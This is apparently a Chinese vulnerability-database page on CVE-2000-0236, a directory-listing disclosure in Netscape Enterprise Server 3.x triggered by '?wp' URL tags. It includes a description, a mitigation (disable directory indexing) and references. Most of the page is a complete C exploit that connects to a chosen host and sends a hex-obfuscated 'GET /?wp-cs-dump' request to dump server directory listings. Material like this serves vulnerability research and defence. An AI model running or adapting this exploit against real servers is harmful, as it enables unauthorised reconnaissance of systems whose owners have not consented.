Netscape Enterprise Server 3.x Web Publishing泄露目录列表漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105754 漏洞类型 配置错误
发布时间 2000-03-17 更新时间 2006-09-05
CVE编号 CVE-2000-0236 CNNVD-ID CNNVD-200003-035
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19814
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-035
|漏洞详情
NetscapeEnterpriseServer是一个Netscape公司开发的Web服务器。在NetscapeEnterpriseServer3.x版本中的"WebPublishing"(主页发布)功能将允许远程攻击者浏览根目录以及子目录内容。远程攻击者可以通过提交一个包含WebPublishing标记的URL(?wp)请求来完成攻击。NetscapeEnterpriseServer默认安装时,"DirectoryIndexing"功能是打开的,可以通过禁止目录列表功能来防止上述问题。
|漏洞EXP
source: http://www.securityfocus.com/bid/1063/info

Netscape Enterprise Server 3.x includes a poorly documented feature that will allow remote users to view directory listings by appending various instructional tags to the URL. Although it can be disabled, Netscape Enterprise Server is shipped with the "Directory Indexing" feature enabled by default. 

/*
 *	Server:Netscape-Enterprise
 *	This exploit is about Trasversal Vuln.
 *
 *	Written by Gabriel Maggiotti
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define SEND	10000
#define RECIVE	100000


char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[SEND]="";
char *pt=strstr(string,orig);

strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}

/***************************************************************************/

int main(int argc,char *argv[])
{
int sockfd, numbytes;
char recv_buf[RECIVE];
int port;

char inject[SEND]=
	"\x47\x45\x54\x20\x2f\x3f\x77\x70\x2d\x63\x73\x2d"
	"\x64\x75\x6d\x70\x20\x48\x54\x54\x50\x2f\x31\x2e"
	"\x30\xa\xa";


struct hostent *he;

struct sockaddr_in their_addr;


if(argc!=3)
{
	fprintf(stderr,"usage:%s <hostname> <port>\n",argv[0]);
	exit(1);
}


if((he=gethostbyname(argv[1]))==NULL)
{
	perror("gethostbyname");
	exit(1);
}

port=atoi(argv[2]);



if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
	perror("socket");
	exit(1);
}


their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(port);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
bzero(&(their_addr.sin_zero),8);



if( connect(sockfd,(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
{
	perror("connect");
	exit(1);
}

if(send(sockfd,inject,SEND,0) ==-1)
{
	perror("send");
	exit(0);
}

if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1)
{
	perror("recv");
	exit(1);
}

recv_buf[numbytes]='\0';
printf("%s\n",recv_buf);




close(sockfd);

return 0;
}
|参考资料

来源:BUGTRAQ
名称:20000317[SAFER000317.EXP.1.5]NetscapeEnterpriseServerand'?wp'tags
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D2173D.24E39DD0@relaygroup.com
来源:BID
名称:1063
链接:http://www.securityfocus.com/bid/1063
来源:NSFOCUS
名称:403
链接:http://www.nsfocus.net/vulndb/403